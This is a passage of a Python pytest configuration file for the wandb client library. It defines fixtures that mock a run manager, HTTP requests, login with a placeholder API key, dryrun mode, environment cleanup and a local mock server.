# NOTE: This will create a run directory so make sure it's called in an isolated file system
# We have an optional rm_class object because we mock it above so we need it before it's mocked
api = InternalApi(load_settings=False)
api.set_setting('project', 'testing')
if wandb.run is None:
wandb.run = run or Run()
wandb.config = wandb.run.config
wandb.run._api = api
wandb.run._mkdir()
wandb.run.socket = wandb_socket.Server()
api.set_current_run_id(wandb.run.id)
mocker.patch('wandb.apis.internal.FileStreamApi')
api._file_stream_api = mocker.MagicMock()
run_manager = rm_class(wandb.run, cloud=cloud, port=wandb.run.socket.port)
class FakeProc(object):
def poll(self):
return None
def exit(self, code=0):
return None
run_manager.proc = FakeProc()
run_manager._meta = mocker.MagicMock()
run_manager._stdout_tee = mocker.MagicMock()
run_manager._stderr_tee = mocker.MagicMock()
run_manager._output_log = mocker.MagicMock()
run_manager._stdout_stream = mocker.MagicMock()
run_manager._stderr_stream = mocker.MagicMock()
run_manager.mirror_stdout_stderr = mocker.MagicMock()
run_manager.unmirror_stdout_stderr = mocker.MagicMock()
socket_thread = threading.Thread(
target=wandb.run.socket.listen)
socket_thread.start()
run_manager._socket.ready()
thread = threading.Thread(
target=run_manager._sync_etc)
thread.daemon = True
thread.start()
def test_shutdown():
if wandb.run and wandb.run.socket:
wandb.run.socket.done()
# TODO: is this needed?
socket_thread.join()
thread.join()
run_manager.test_shutdown = test_shutdown
run_manager._unblock_file_observer()
run_manager._file_pusher._push_function = mocker.MagicMock()
return run_manager
@pytest.fixture
def run_manager(mocker, mock_server):
"""This fixture emulates the run_manager headless mode in a single process
Just call run_manager.test_shutdown() to join the threads
"""
# Reset the tensorboard state
wandb.tensorboard.reset_state()
with CliRunner().isolated_filesystem():
run_manager = fake_run_manager(mocker)
yield run_manager
wandb.uninit()
@pytest.fixture
def loggedin():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_API_KEY"] = "X"*40
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
@pytest.fixture
def dryrun():
orig_environ = dict(os.environ)
try:
with CliRunner().isolated_filesystem():
os.environ["WANDB_MODE"] = "dryrun"
yield os.environ
finally:
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
# "Error: 'Session' object has no attribute 'request'""
# @pytest.fixture(autouse=True)
# def no_requests(monkeypatch):
# monkeypatch.delattr("requests.sessions.Session.request")
@pytest.fixture
def request_mocker(request):
"""
:param request: pytest request object for cleaning up.
:return: Returns instance of requests mocker used to mock HTTP calls.
"""
m = requests_mock.Mocker()
m.start()
request.addfinalizer(m.stop)
return m
@pytest.fixture(autouse=True)
def preserve_environ():
environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
@pytest.fixture(autouse=True)
def check_environ():
"""Warn about WANDB_ environment variables the user has set
Sometimes it's useful to set things like WANDB_DEBUG intentionally, or
set other things for hacky debugging, but we want to make sure the user
knows about it.
"""
# we ignore WANDB_DESCRIPTION because we set it intentionally in
# pytest_runtest_setup()
wandb_keys = [key for key in os.environ.keys() if key.startswith(
'WANDB_') and key not in ['WANDB_TEST', 'WANDB_DESCRIPTION']]
if wandb_keys:
wandb.termwarn('You have WANDB_ environment variable(s) set. These may interfere with tests:')
for key in wandb_keys:
wandb.termwarn(' {} = {}'.format(key, repr(os.environ[key])))
@pytest.fixture
def mock_server(mocker, request_mocker):
app = create_app()
mock = utils.RequestsMock(app.test_client(), {})
mocker.patch("gql.transport.requests.requests", mock)
mocker.patch("wandb.apis.file_stream.requests", mock)
mocker.patch("wandb.apis.internal.requests", mock)
return mock
@pytest.fixture
def live_mock_server(request):
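"""Run the mock server app in a separate process listening on a real local
port (8765 unless a 'port' marker overrides it) so tests can make actual
HTTP requests; the process is terminated and joined when the fixture exits.
"""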
if request.node.get_closest_marker('port'):
port = request.node.get_closest_marker('port').args[0]
else:
port = 8765
app = create_app()
server = Process(target=app.run, kwargs={"port": port, "debug": True, "use_reloader": False})
server.start()
yield server
server.terminate()
server.join()